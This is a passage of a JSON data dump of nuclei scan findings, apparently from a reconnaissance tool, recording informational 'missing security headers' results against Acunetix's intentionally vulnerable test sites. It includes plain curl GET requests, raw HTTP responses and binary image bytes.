Acunetix HTML5 scanner or <a href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuart</td>\n <td><a href='http://testphp.vulnweb.com/'>http://testphp.vulnweb.com</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'>Review</a> Acunetix PHP scanner or <a href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuforum</td>\n <td><a href='http://testasp.vulnweb.com/'>http://testasp.vulnweb.com</a></td>\n <td>IIS, ASP, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'>Review</a> Acunetix SQL scanner or <a href='https://www.acunetix.com/websitesecurity/sql-injection/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acublog</td>\n <td><a href='http://testaspnet.vulnweb.com/'>http://testaspnet.vulnweb.com</a></td>\n <td>IIS, ASP.NET, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'>Review</a> Acunetix network scanner or <a href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'>learn more</a> on the topic.</td>\n </tr>\n\t\t<tr style="font-size:14px">\n \t<td>REST API</td>\n <td><a href='http://rest.vulnweb.com/'>http://rest.vulnweb.com/</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>Review</a> Acunetix scanner or <a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>learn more</a> on the topic.</td>\n </tr>\n </tbody>\n</table>\n\n<div style="background-color:lightgray;width:60%;text-align:center;font-size:14px">\n<p style="padding-left:140px;padding-right:140px"><b>Warning</b>: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.</p>\n</div>\n</center>\n\n</body>\n</html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 1002, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 1, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36' 'http://vulnweb.com'", + "type": "http", + "http_url": "http://vulnweb.com", + "discovered_date": "2024-11-13T02:42:49.717Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:42:26 GMT\r\nEtag: W/"5f1fedf1-fb2"\r\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">\n<html xmlns="http://www.w3.org/1999/xhtml">\n<head>\n<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\n<title>Acunetix Web Vulnerability Scanner - Test websites</title>\n<style type="text/css">\n<!--\n@import url("style.css");\n-->\n</style>\n</head>\n<body>\n\n\n<center>\n<br>\n\n<a href='https://www.acunetix.com/'><img src='acunetix-logo.png' border='0' alt="Acunetix website security"></a><br><br>\n<div>Vulnerable test websites for <a href='https://www.acunetix.com/vulnerability-scanner/'>Acunetix Web Vulnerability Scanner</a>.</div>\n\n<table id="one-column-emphasis" summary="Acunetix test websites" style="width:60%">\n <colgroup>\n \t<col>\n </colgroup>\n <thead>\n \t<tr style="font-size:14px">\n \t<th scope="col"><b>Name</b></th>\n <th scope="col"><b>URL</b></th>\n <th scope="col"><b>Technologies</b></th>\n\t\t\t<th scope="col"><b>Resources</b></th>\n </tr>\n </thead>\n <tbody>\n \t<tr style="font-size:14px">\n \t<td>SecurityTweets</td>\n <td><a href='http://testhtml5.vulnweb.com/'>http://testhtml5.vulnweb.com</a></td>\n <td>nginx, Python, Flask, CouchDB</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'>Review</a> Acunetix HTML5 scanner or <a href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuart</td>\n <td><a href='http://testphp.vulnweb.com/'>http://testphp.vulnweb.com</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'>Review</a> Acunetix PHP scanner or <a href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuforum</td>\n <td><a href='http://testasp.vulnweb.com/'>http://testasp.vulnweb.com</a></td>\n <td>IIS, ASP, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'>Review</a> Acunetix SQL scanner or <a href='https://www.acunetix.com/websitesecurity/sql-injection/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acublog</td>\n <td><a href='http://testaspnet.vulnweb.com/'>http://testaspnet.vulnweb.com</a></td>\n <td>IIS, ASP.NET, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'>Review</a> Acunetix network scanner or <a href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'>learn more</a> on the topic.</td>\n </tr>\n\t\t<tr style="font-size:14px">\n \t<td>REST API</td>\n <td><a href='http://rest.vulnweb.com/'>http://rest.vulnweb.com/</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>Review</a> Acunetix scanner or <a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>learn more</a> on the topic.</td>\n </tr>\n </tbody>\n</table>\n\n<div style="background-color:lightgray;width:60%;text-align:center;font-size:14px">\n<p style="padding-left:140px;padding-right:140px"><b>Warning</b>: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.</p>\n</div>\n</center>\n\n</body>\n</html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 1003, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0' 'http://testphp.vulnweb.com/pictures/6.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/6.jpg.tn", + "discovered_date": "2024-11-13T02:42:49.994Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/6.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4345\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:42:20 GMT\r\nEtag: "4dca64a1-10f9"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001d\u0001\u0001\u0005\u0001\u0001\u0001\u0004\u0003\u0005\u0006\u0007\b\t\u0002\u0001��:\u0010\u0002\u0001\u0003\u0003\u0002\u0005\u0001\u0006\u0004\u0004\u0007\u0001\u0001\u0002\u0003\u0004\u0011\u0005\u0012!\u00061\u0007\u0013"AQa\u00142q���\u0015#B�\bR��\u0016$br������\u001b\u0001\u0001\u0005\u0001\u0001\u0001\u0002\u0003\u0004\u0006\u0005\u0007��0\u0011\u0002\u0002\u0001\u0003\u0003\u0001\u0006\u0005\u0005\u0001\u0001\u0002\u0003\u0011\u0004!1\u0005\u0012A"\u0006\u0013\u0014aq�2����BQ������\f\u0003\u0001\u0002\u0011\u0003\u0011?�JR��~���'�\rz5���[��PU�pT\u0012\t�$�a߷֛)�\u001f��T��ĩUn ��y!�7�Xث��\n�pA\u0007�~C\u001b�*�\u0012���*���O`)�\u0014�[n?\u000bm���_��Fv���@Hls���X���:�u\u000f��ݣ�e.��"�G�#<7��#\u0004�0Mh�)�q.\t\u001dR^\t�\u0015�\u0017�]iڽ��-�\u0013,',���\u0018��<�;��gu\u001e�\u000e����P\t�e�7*��'����M��\fVR�LH������\f\u001c�ˑ�\u0007\u0015�i]=\u0012�+.X\u00101���9\u0003۵f��I����\u0005��Ma\u001cg��M�^�kp1$M��\u0010\u000f�\u0019��\u0011�"�WV�/OEu%�\u0017\u0010�,�ݸ>p0�l��\u0003 �\\v��=K�E�ot���[iZ3�\n�\u0001����\u001f��E���;rS��[-ԥ*�\b�)@\nR��)@\nR�DŽ�\u001a����x��\u0012��६�C ~1�\u001c烐p1ۜT:�Ezx;,xHt ���/��[T��Oan��\u0014�6]FH ��~\u000e����Ji��\u0014��j;���OW�\u001f�\u001f53��4��n$��9\u0012eo0�`�b�9\u0001�#,��\u0004��Y����.\u0012g�[{�\\1\f������������azj����->���Ma��\u0011�ꚽ��\u0018f�G�q\u0012&�&3��Q�0T��������E�[^�Is�tp�[1\f{�\r��~\u0004�z�5�G\u0012eG�:�@8'�\u001e@� \u0001��H�\\6����8�� �\u001c�ƌz��;��1�y��\u0013\\�=���\n*\\~ÝUJO(�ZD!\u0002$��e�\u000eCn\u001fF\u001c\u001fʯ�t�w�K\u001cc\u0002u-\u001b�68�\u0019?\\sߜ�qY���$���뱉b\n���>~�Z��8S�Q���s�U;z����̙(��[�X]DV\u001b�W}�\u0002\\\t\u001c\u001e���\b�Y��h�F��\n4��a��8�l�\u001e;�\u0013�*�5��^-��3�\u0001 pO������k\u0003\u0018�n#B\u0019J�<�\u001e��]F��/�'zQ��d�0\\}�y\u001b|ou4H\u0013��Y�g#��3\\��$�\u0017�����A"G�Z��1�y�&7���3��}��.���NH��0�\r�g\t�L\u0012���X\u000f�\u001e\u001f���ؠ��\u001e�\f�u��p��\f��\u0014�\\��\u0007\u0007\u0018=N��#��E��/)���7�{\f.N �JԬ��o�,�#1����J��������*-zj�tr�*�A"���a\u0013�"�\u000e\u000b\t������@\nR��)@\nݽ\u0019�\u000e��tJi7�;\u000f�\b\u001d\u0004W6Q�^bn\u001b��r�\u0001݇\fG�q��*U}N��TT-YI�t&��\u0013�n���7�tKy�n-�%x\u0004�\bϨ\f.C\u0002ʳ\u0005$pH8�\b[��"]�-���,�r-\\\u0004i��#.Oel\u0010\u001b�;O#\u0019�O\n�@��}n9�.�\u000f i�\u0007��o�\u0003�\nϺ��[�g�4�m<�:��Y��+mf���n�\u0015�M��Fw��\u0007z�_�ŰԿq�1��\u001f,y-���[��}2�\u0005 x�Q<Bkq'\u000f�\u0003r���I\u0003\u001f\u0004|\u001a�%�b΀�\u0007'��.��g�����ݕ����\u0015i!�+�1�\u0001\u000e�%�\u0018����F+=�b��1ナ�YMt݋��ș�\u0019Dt��\u0014\\�\u000e_fcRC}x�\u000fDZ�>�\rݵմ�kr�\u0016��ψ��^0Ɂ�\\\u0013�\u00169<�\u0001W8�Y�z\u0015<�;Np�����U\u0003�\u0004\u000eǸ��Дc?W\u0001��"�\\%�@��'\u0001��ʺ�����=�\u001a�P��7��\u001f� �K;��\u001c��\u0006\t\\z�\u0017�\u0005��0��rx\u0018\u0019�n)�M��_�G"5�I%��\t\u0002V�����qT��/,\u000e�\u0019]C�\u0003��\n��\u0003R���a\u0001\u0016�\u0014h�E��1\u0004�p\u000f\u001f8��QU\\��\u0016^E�74w��\u0010�p�sG�b�\u0015\u0001fE?˺���l\u0003\u001e;\u0006��.\u0003ᯄ6�\u00163[u��MQ�%b��hT*�0R;�'��\\`溺�$��<�(0�\u0018�|`��U�P��]ķ�!�B�>0T�a\t��\u0019\u001e�\u0011�gAG]�Q��f���RǏ��"�\u001c��5~��t��M�6��$p��I��+�m�\f\u0002{�x��9\u000bZ�.�mR�O�����r���<\u0010\u000e\b�}\rz;\fP�\u001cN�dP7F㜃��pG��\\��'|5�L\u000f�Z4\u0011��)k����I�#.J�z\u0007$�=9�8\u0002�~�u��t^��\u001f_�3Q\u00055���\\�)[€�)@\nR��)@\u001d5�7�K'H�\u001a���}.O9\u001eFr\u0004\u001d�*�\u000b(�\r��v\u001c1<o��EK[����1R$i\u000b\u0015�c@����\r���\u001c�\n��@�nt]R\u001b�6ı��̧�S��Eu����%��q̗��л\u001c\u0003�$�\u0019��)��\f�\rb���**WU���Ogz�f�Ԅ����\u001d��-< *��d1��\u0014c<\u001f�q����j���Im$��:\u000f0\u0014V_Ab\u0007��\u0004\u0015*W$����Z����;M\u0006�SYLRYrʌ]��\u0014\u000e\u0007��\u00198�\t�lU�ÿ\u0013���d�\u0013ej���e���\u001f��\u0018e*�6{z\u0018}�\u000e\u001d\u001d3U\n%j_-��G�4�2����������1��bIc�f\u0001ܣ%\u001aA�'�RN\u0014\n�b>ߤ���>Z2�g\b��r��r\n�#���-N���\t�l�2�BF\u000f�\u0011�E}i��'��ܬ2yh��lM����@?�\u000f\u001d��)O�\u0012�"4��\u0017\u000b4A�ӆ(�N@e$0\u0007\u0003 \u0010Goj4�b��W\u0002\t1�g<q��?\u000b�1���N\u0013��X���8\u000e��1\u001a�\u0007�rs��J�4{�{eNy��l���N�'\r��ڟ%��9?�\\H��樑d\u000e�y�vc\u0018�l\u001eC\f��c?��u\u0017�:�\u0018\u0015 ���9\u0007����E��h�f��N�? g�##>٩v�)q\n�\u0013\u0006\f��\u001d�����9+������5�أ%��}�\u0018x݁uw<r2�y�\u0019�܏bI0z�N�R���h�{gc�G*���F\u0018!�\u000er;\f��o�!�X���v��\u0003\u0003;� d�H'\u0007��y\u0014Yb����/\u001f���\u0016����Bj:O^����ks~��e��\u000b��\f7#�\u0001�Or\u0006\u0001\f=��ֽ\u0019��eݬ\u001a�������Ȍ\u001d\u001cP\f?�O\u0004w\u0007�A=ܶV�k�$� ���Ci+\u0016$$�\u0017�9>�\u0019\u001c\f2ջ�.���Γ�ѵ+cotS̷�\u001b\\E0�\n�3�0r\u0001*���6�j��\\m��\u001e�����^zd����Vs�x[��e��uu�I�m8o�t�\u0018���\t�̀\u001eX\f.\u0018\u001c\u0015l`ղ���Y�I�\n�.<�R� ���+$鞮�zz�h�Xs�E��S\u00122G>�c��t��\u0011�ĖP���&˩�M\u0014��w<�����,\t�>�P)�j7:N�\r唅'��\u0003�~��j\u0015)ZMa��:��z�\u0014�i.\r�0��b�6�.~�\u0012I��Ͼs���������[�V\r���˒�\u0016%s�<���5����\\�G�7NH��w���<Ռ>F@,�w\u0003�s�9"�����=jd&W��ԏ1�m��ڟ@��ܱ��\u0005�4��l�Q�K)�|c�:TNV�&f):��\f9��\u0003������\u000f|��H��Kx�9�Ya�\f�T��.J��]�%�w�|�&0�w\u0003�\u000foҲ�\u000eܢ�c�a�\\SP��\u0011$2��7\u001b��|~+\u001b��[[����0$�ô\u0010s�~y�g�����-/��_4D�ޑ���9��@\u001f#��S5m@\\�\u001e�0ϸ�2��($��}���N\u001a\u0019S-�c��62�5�V�t���VR�\u0019�~�F\b �`�Ի=v���V2<�\u0002�bA��1' �3ܑ�yƓ��R�U�\u001d��\u0018�E��9ܟ�\u0003۱����T=T�ƭ��RyU7�*��\tu\u0005�G\u0003qQ���ƬˢO�e��\u0010���Q�:��5�s�F�l�\b#�\u000fЃ����ZMom��s2��}���`\u001229�\b�����#��{v�\u001c��V�\u0018u#��@��\\��_X��RА;\\+�Y�}\u0003��\u001c��+��*N���)���?an�W\u0013lx��/��\u0017���t�wD4N��I�\u001d���\u001d�@? v���r9��������ו���7%�9��5N�=?�ס��~Ne��\u001eX�)Wȅ)JR��\u0005)J��^ɧjVװ�2[Ȳ�e\f\t\u00078 �\b�\u0011��۾��P�M�Fb�H��\u000b�\\+/\u0003�\u000e\t�\u0013���j�tް�,��k\u0015t{kv-\u0018 �\\�\u0006�\u0012H�&���\u0004un2���znu��}#]\u000f:��=9a�~ď�\u001a��j�V���ʪ\u00103��\u0006I\u001e��{r\u0007\u0015�4\u001dXKio{lΚh��)%\u001e�\u0018��\u001d�\u001c\u0015��c���\u001da\u0016�u\u0004s�C\u0018\u000b$C'w�\u0004��n\r��������\u0014]��G,�u7_ZOc\u0006�\u0010H�l����� s��\u001fp\u0006@'�����K4\u0010�{\u0015IJ@]�\u0016m\ny�8\u0018���\u001a�ɼ�.n��3J�\u0015��I��Q���#�Ը�り�Y�z�\u000b���}F�\u0012\u001a7��ubC����x8��8�Z.���v�����[\u001fO�I\f��F�� �#�\u0013�V�U�\b��cn\b���rX��e��|�=��A�(PB��m\\\u001eG\n���'V��\rA�Mf���w�!*�����[�QU����\u0016\u0007J�K�JR�\u0018)JP\u0002��)JP\u0002��)JP\u0006ᖳq��]?%�\ry����� �\b�;f����f��ۉ�\n�Y��4���X�Q�N�$��iJ�\u0018�s��Hߤ�Ҕ�$b��)JP\u0002����", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 1004, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4883.150 Safari/537.36' 'http://testphp.vulnweb.com/wvstests'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/wvstests", + "discovered_date": "2024-11-13T02:42:50.323Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /wvstests HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4883.150 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:42:27 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /wvstests/</title></head>\r\n<body>\r\n<h1>Index of /wvstests/</h1><hr><pre><a href="../">../</a>\r\n<a href="pmwiki_2_1_19/">pmwiki_2_1_19/</a> 08-Apr-2013 08:44 -\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 1005, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/606.1.36 (KHTML, like Gecko) Version/9.1.2 Safari/606.1.36' 'http://testphp.vulnweb.com/pictures/7.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/7.jpg.tn", + "discovered_date": "2024-11-13T02:42:50.580Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/7.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/606.1.36 (KHTML, like Gecko) Version/9.1.2 Safari/606.1.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 6458\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:42:21 GMT\r\nEtag: "4dca64a1-193a"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0001\u0005\u0001\u0001\u0001\u0006\u0002\u0004\u0005\u0007\u0003\u0001\b��6\u0010\u0002\u0001\u0003\u0003\u0003\u0002\u0004\u0005\u0002\u0007\u0003\u0001\u0002\u0003\u0004\u0005\u0011\u0012!\u0006\u00131"A\u00072Qa\u0014\u0015#q�B�3CR���������\u001b\u0001\u0003\u0003\u0001\u0001\u0004\u0005\u0006\u0001\u0003\u0007\u0002��0\u0011\u0001\u0003\u0003\u0002\u0004\u0003\b\u0003\u0001\u0001\u0001\u0002\u0003\u0004\u0005\u0011!1\u0012\u0013AQaq�\u0006\u0014"2�������\u0015B��\f\u0003\u0001\u0002\u0011\u0003\u0011?��I�KMc��������^�ܡ�y!�2��w\u0005c�ϓϑ�\u0019�|x�\u001bT]K=$4n�2�\u0014ʌb��\f�\u0018,1φ�G�Qz~��=t�W�\u0002\u001aF*�O0uw�G�����|��q�7<6nI��<��\u0012)]%?��@�\u000ez�q���\u0014\u0003�s�j~��E ����μ��\u0017�Rׄ�H�7Y_$�5��T��\u0018Bʤ���������}\u001d�&�#R���O�d>�� y�\u001c��\u0007VR\u001c�\u0001u�v�4*Q�\u0018�� ���ަ\u0003\n\u0014�;���\f�ppt5\\��a�l\u0006��:�L��\u00059\u0007$�5ǧ�3����i��vb`�J�d�\u000f��jNﶃ:B�u�)�2\u001fS;�\u0014�"�İ�\u0007r�\u0004K1\u0003h�\u0003:.W��Y���;�w\nCI9������\tϝ3w�H��D�p�f�y�\u000b\rp���\u00171�~\u000e7x϶uWCw�D�\u000b�\u0012E@�\u000e�\u0018\u0012FAR}���\u000f\u0007\u0004\u00105:V���r����0�ѐ7W\f��\u0017n04� o}r�N>��+\rb�':�6Ll\u0011��8lx�Bt���c+[����\u000fIt�j�Y!��!�^�qʑ�,{�疉q�_�����d\u0014��G$P��\n\u000eԳ��\r�R����<g\u001cx�]�H�\u001dT�J�VشQ��l�dd�\u0003$g*\b\u0004��:�r�\u001bg�M$�\u0004h����V�Km\u0018珮F�E\u001bc����\u0018�󟲧�Ϛ�\u001b �S�v�������\u000b�\u0012�\bc}�PHq��������KQ\u001cK�WD\\��8��\u000f�Ӭ��R��i�#U+:Y�JJ���2B��\fW ��A�q�\u0019�Ρy�i��;^\u0013�4�8\u001f}}a|\u0012�\\Zu���\u0015\u001eP���±�\u0004�\u0006�//_\f�OC��\u0014KP�Xa/�j�!F\u0007k8;�@%x$`�Rx�_U\n��b��I\u0005E\u001c��%1�8�;����`����\u0007:Ww��L��rF�P{;8�����u'���\\::�b\u00163G�B�!;Ӎ�\u001caW����<\u000fa�$�`s���+䦪Ji�\u0018\u0012Aߌ+.\u001d_��\u0005P��]X\u0001��6�Z�8�\u001eK�\u0018D\u0019c�\u0018\u001a�����k��[o4O\u0015nk[����}ƚ�}�7u�Ĵ3H��M�7q&��*����N\u0007��p�ա�w�q���~�\u0001�~���=��E�锳�|��Lnp�\\3$\u000e���1����\n��;�B����(b�G�8c�\u0001vg,Ac�\u0013$�\u0005�J^�^=����ϝ\nu+�QG:\u0019B\f\u001c�#��΄�`q\u0012��M�\u0013[[�C�x�]��\u00158�4F:s\u0013"���RRT�y ���|���R�3��\u0002��ܮ}\u0011=ʎ\u0016���(bhi`H�\u0011\u0005";\u0011F�I�\n�?0b��:z�=L�4ҁ�\b�\u0001G\u0007�}������<���\u001c`t�?�8�X\u001bN�$/�[Vt�<\u001c���imS�@er�C\f\u0011�\fu\u0005������B��v�C�8� �8� ��D��uC�Z�H�s\t��Ͼ|\u0018�>O�\b\u001e��� ��\u0016�\u001d\u001c�!�>(*�Vl�PϲX�gqHӘ�]��\t\f��6L\u001cn8q.\u0015A\u0018!���5����'���\u0013�\u0016\u0013\u0006\u0014�9`�\u0005\b;9\u0007$�\u0003�hJ��ӳ�I�u=]\u0015X\u0002�\f�\u000b�'�T�_<����\u0001l��̴\u00157\u001b|�!�Id�\u0015-\u0018��w+6_�\u000b����|���jJ:��r�,\f���L\u001d�����5\u0015%W\r�\u0013��p5$�\u0016�iHऎ\u0018c\u0011"q�\fs�~�\u001f�����{�(\n1��7\u001c}��mH�ީ�\u000f�2f�i=��L�������a���2F�\f$esɩ�yt�\u0007����w\u001d7��\u0003g��':ނ�Ls�Uq\t#`@ �}KsƸK�5�j\u0016��i�@�].\u0004sȒƵ\u0012\f���퐟�p��\u0004����d\u0012\u0015��*�t�U�Lf�a\u0006A\u0002\u0017S\u001b�;�������\f0q�\u0005�u���_P6ᐰ#�\n��\u0011�\b��\u0013[)�p����KOz��r��\u0006p�$���r��[y��M;\u001ao�4���!f, 